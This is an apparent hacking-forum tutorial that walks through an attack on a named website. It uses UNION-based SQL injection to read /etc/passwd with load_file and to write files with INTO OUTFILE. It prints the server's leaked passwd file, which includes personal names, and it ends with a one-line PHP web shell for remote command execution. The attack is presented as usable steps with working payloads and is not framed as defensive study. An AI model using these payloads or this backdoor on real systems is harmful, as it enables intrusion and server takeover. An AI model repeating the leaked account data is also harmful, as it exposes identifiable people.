I see lot of people SQL injecting and trying their hard luck to get in admin panel to upload a shell.
– This Tutorial is not N00b friendly – If you use Tools for SQL injection don’t bother reading this –
http://www.trends-in-newsrooms.org/articles.php?id=
There is total 14 Columns and i took 1 as visible
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select+1,2,3,4,5,6,7--
now try to see if you can load_file in the visible column.. We can read files in this server using this command.
Usually you can exec this command if you have access to table mysql.users–
example : – 1 union all select load_file(‚filetoload‘),2,3,4,5,6 from mysql.users–
Ok now lets take the case of this website.. lets try to read its /etc/passwd so we can get the actual path where the website is located.
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select%20load_file%28%27/etc/passwd%27%29,2,3,4,5,6,7--
The website will display the ‚/etc/passwd‘ file.
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh stephane:x:1000:1000:stephane,,,:/home/stephane:/bin/bash sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false Debian-exim:x:102:104::/var/spool/exim4:/bin/false statd:x:103:65534::/var/lib/nfs:/bin/false identd:x:104:65534::/var/run/identd:/bin/false postfix:x:105:106::/var/spool/postfix:/bin/false postgres:x:106:108:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash sympa:x:107:110:Sympa mailing list manager,,,:/var/lib/sympa:/bin/false ftpd:x:1001:1001::/home/ftp:/bin/nologin juancarlos:x:1002:1002:Juan Carlos Cedillo,,,:/home/juancarlos:/usr/lib/sftp-server clamav:x:108:111::/var/lib/clamav:/bin/false libuuid:x:109:112::/var/lib/libuuid:/bin/sh wanadmin:x:1003:1003:Stephane Karges,,,:/home/wanadmin:/bin/bash aralynn:x:1004:1004:Aralynn McMane,,,:/home/www/vhosts/wan-press.org/httpdocs/nie/downloads/:/usr/lib/sftp-server
/home/www/vhosts/wan-press.org/httpdocs/
Probably this is the path where the site seems to be located, which i am not very sure although… Lets see if we can write a file in this directory..
I don’t want any numbers to be written on the file i am going to write into the server. so i am gonna change 2,3,4,5,6,7 to ’null‘
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select%20%27Rocket~Scientist~was~here%27,null,null,null,null,null,null+into+outfile+%27/home/www/vhosts/wan-press.org/httpdocs/epic.php%27--
Fayul~ we get a response.
Can't create/write to file '/home/www/vhosts/wan-press.org/httpdocs/epic.php' (Errcode: 13)
It means the path is not chmod to 777 that we can write any file there or we don’t have permissions to write into another website using mysql. Okay lets try writing it somewhere else.
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select 'Rocket~Scientist~was~here',null,null,null,null,null,null+into+outfile+'/var/tmp/fayul'--
Page loads fine, Now check..
http://www.trends-in-newsrooms.org/articles.php?id=-20%20union%20all%20select%20load_file%28%27/var/tmp/fayul%27%29,2,3,4,5,6,7--
Site will display „Rocket~scientist~was~here“
Similarly, if you can find path of this website you can write a php backdoor. Replace Rocket scientist was here with..
'<? system($_REQUEST['cmd']); ?>'
After you upload to path of site succesfully you can upload your shell by going to site
http://www.site.com/pathtoyourbackdoor/lol.php?cmd=ls -la